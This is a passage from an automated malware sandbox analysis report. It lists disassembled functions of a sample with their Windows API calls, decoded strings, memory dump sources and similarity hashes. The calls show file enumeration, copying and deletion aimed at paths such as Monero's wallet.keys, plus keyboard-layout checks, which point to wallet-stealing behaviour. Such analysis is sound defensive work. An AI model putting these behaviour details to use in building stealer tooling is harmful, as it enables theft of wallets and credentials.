                    • StrCmpCA.SHLWAPI(?,003D525C), ref: 003B1973
                    • StrCmpCA.SHLWAPI(?,003D5304), ref: 003B1989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003B1D40
                    • DeleteFileA.KERNEL32(00000000), ref: 003B1DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003B1E20
                    • FindClose.KERNEL32(000000FF), ref: 003B1E32
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                    • Instruction ID: 7ea48e0572a445ec50f9ca73c0fe291525833055e0d230af46d4738ac5b1cf1b
                    • Opcode Fuzzy Hash: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                    • Instruction Fuzzy Hash: C612EE7191061C9BDB16EB60DC96FEE7778AF54304F40419DA10AEA091EF306F89DF92
                    Function 003BDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003D0C2E), ref: 003BDE5E
                    • StrCmpCA.SHLWAPI(?,003D14C8), ref: 003BDEAE
                    • StrCmpCA.SHLWAPI(?,003D14CC), ref: 003BDEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BE3E0
                    • FindClose.KERNEL32(000000FF), ref: 003BE3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                    • Instruction ID: a7e08904b4a463a82633a1d093aebe47f33c9bef258e4caeb95074b0ad303125
                    • Opcode Fuzzy Hash: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                    • Instruction Fuzzy Hash: ABF19E7181061C9BDB26EB60DC96FEE7778BF14304F80419EA50AA6091EF346F4ADF52
                    Function 003BDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D14B0,003D0C2A), ref: 003BDAEB
                    • StrCmpCA.SHLWAPI(?,003D14B4), ref: 003BDB33
                    • StrCmpCA.SHLWAPI(?,003D14B8), ref: 003BDB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BDDCC
                    • FindClose.KERNEL32(000000FF), ref: 003BDDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                    • Instruction ID: 8f44192cde8f0c59372748a14491a97c52430196df6c574d0fe639ab145f8337
                    • Opcode Fuzzy Hash: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                    • Instruction Fuzzy Hash: 5791237290060897CB16FBB0EC56EED777DAB94308F40855DF90ADA541EE349F09CB92
                    Function 00778034 Relevance: 12.8, Strings: 9, Instructions: 1544COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: >ZI$Au8D$B}7_$J9H)$al1i$p,[m$r:?}$w6m${3
                    • API String ID: 0-3651634773
                    • Opcode ID: 46a663db050d81775c4d6cc140fe4a4c2eeea916375f7500fb568de1ef805144
                    • Instruction ID: 13ea682af6de5bf93b4d65a2c6d0de3f63e28bdac752db2fefc5c9bc41252879
                    • Opcode Fuzzy Hash: 46a663db050d81775c4d6cc140fe4a4c2eeea916375f7500fb568de1ef805144
                    • Instruction Fuzzy Hash: 79A2E6F360C2049FE304AE2DEC8567ABBE9EF94720F1A493DE6C4C3744E67598058697
                    Function 003C7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,003D05AF), ref: 003C7BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 003C7BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 003C7C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003C7C62
                    • LocalFree.KERNEL32(00000000), ref: 003C7D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                    • Instruction ID: 17cf1d60a44c48f23c615e98031716b4f6528423e101a471ed6c012bb636206c
                    • Opcode Fuzzy Hash: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                    • Instruction Fuzzy Hash: FB415D7194021CABCB25DB94DC99FEEB7B8FF54704F204199E40AA6290DB742F85CFA1
                    Function 003BE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003D0D73), ref: 003BE4A2
                    • StrCmpCA.SHLWAPI(?,003D14F8), ref: 003BE4F2
                    • StrCmpCA.SHLWAPI(?,003D14FC), ref: 003BE508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BEBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                    • Instruction ID: cae9fdf192c7f3fac64f1f8c94414325effafbf5df59591fd10dfd917382d9fc
                    • Opcode Fuzzy Hash: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                    • Instruction Fuzzy Hash: AC124C7290061C9BDB1AFB60DC96FED7378AF54304F4041ADA50ADA191EF346F49CBA2
                    Function 007764D4 Relevance: 9.2, Strings: 6, Instructions: 1664COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ,&f{$0{V^$A9y$X8y$f4^,$]f
                    • API String ID: 0-16138498
                    • Opcode ID: 59263fd4371b8478f75a63fd84c0d92b0f191380ab18ab05c1b0129fa801a2a3
                    • Instruction ID: 2051c73aac7e21bf91dfc4fc7bc053037dadb05c9097d81ef8f275c5f2d43a0d
                    • Opcode Fuzzy Hash: 59263fd4371b8478f75a63fd84c0d92b0f191380ab18ab05c1b0129fa801a2a3
                    • Instruction Fuzzy Hash: F0B2E4B390C2149FE304BE29DC8567AF7E9EF94760F1A492DEAC5C3744EA3598008797
                    Function 0077B4CF Relevance: 9.1, Strings: 6, Instructions: 1645COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: /*@;$3^w$4"?$a6;o$e>{_$n|Wl
                    • API String ID: 0-457620451
                    • Opcode ID: 813252cfad1f20108e4836803d2c693068b0bd7c523ee7981cdb03d39c468810
                    • Instruction ID: db3e8e3a464158f414779f006a1105cf0abc2ef546fccb0bfa5e4d98c3be10ba
                    • Opcode Fuzzy Hash: 813252cfad1f20108e4836803d2c693068b0bd7c523ee7981cdb03d39c468810
                    • Instruction Fuzzy Hash: 67B216F3A0C2049FE3046F2DEC8567AB7E9EB94720F1A4A3DE6C5C3344EA7558118697
                    Function 0078578E Relevance: 9.1, Strings: 6, Instructions: 1631COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Yv$rlw$ted Kingdom.$"3$L_^$X_w
                    • API String ID: 0-3489168069
                    • Opcode ID: 4204476cadcf46c8876682667f5e3f4759a07ea9d60374c1fc51e4e25f8d5556
                    • Instruction ID: bba96bc01206afde4753c353c37e38a957882d79d055f401970d23c70509b863
                    • Opcode Fuzzy Hash: 4204476cadcf46c8876682667f5e3f4759a07ea9d60374c1fc51e4e25f8d5556
                    • Instruction Fuzzy Hash: 9EB23AF3A0C2049FE704AE2DEC8577ABBE5EF94320F1A463DEAC5D3744E63558018696
                    Function 003B9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                    • LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID: N;
                    • API String ID: 4291131564-1002446643
                    • Opcode ID: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                    • Instruction ID: 93ea7029b0fedafe253c75bf2e29026be616577140272f261b31caf22be047ee
                    • Opcode Fuzzy Hash: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                    • Instruction Fuzzy Hash: EE11AFB4240308EFEB10CF64DC95FAA77B5FB89704F208059FA199B390C7B6A901DB91
                    Function 003BC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
                    • lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                    • lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                    • lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
